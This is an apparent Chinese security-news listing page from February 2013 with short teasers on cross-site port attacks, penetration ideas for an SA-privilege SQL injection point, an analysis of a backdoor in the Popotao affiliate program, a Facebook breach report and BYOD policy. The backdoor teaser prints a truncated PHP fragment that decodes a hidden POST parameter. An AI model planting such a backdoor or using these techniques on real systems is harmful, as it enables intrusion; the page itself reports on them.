跨站点端口攻击 – XSPA(SSPA)2013-02-17


        许多Web应用程序提供的功能将数据从其他Web服务器,由于种种原因。下载XML提要,从远程服务器,Web应用程序可以使用用户指定的URL,获取图像,此功能可能会被滥用,使制作的查询使用易受攻击的Web应用程序作为代理运行在远程攻击其他服务的基于
阅读全文>>
  • 阅读:0 评论:0
  • 相关标签

SA权限网站和数据库分离的一些思路2013-02-17


当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。   SA点,system权限,可执行命令,web和d
阅读全文>>
  • 阅读:0 评论:0
  • 相关标签

泡泡淘(popotao)淘客程序官方后门分析2013-02-17


泡泡淘20130204的版本 后门代码文件在include/admin.func.php最下面。    if ( isset( $_POST['_MDFK'] ) && ( $tks = trim( $_POST['_MDFK'] ) ) )     {     $_tks = explode( "|", ~base64_decode( strrev( sub
阅读全文>>
  • 阅读:0 评论:0
  • 相关标签

Facebook遭遇黑客攻击 未影响用户数据安全2013-02-17


        2月16日消息,据国外媒体报道,昨天Facebook对外宣称,该公司已成为不明黑客团体一系列攻击的目标,导致Facebook员工的笔记本中被植入了恶意软件。不过Facebook也在随后表示没有任何证据表明用户数据受到了影响。        
阅读全文>>
  • 阅读:0 评论:0
  • 相关标签

上班用手机 企业如何合理推行BYOD规则2013-02-16


 个人负责制的优点
阅读全文>>
  • 阅读:0 评论:0
  • 相关标签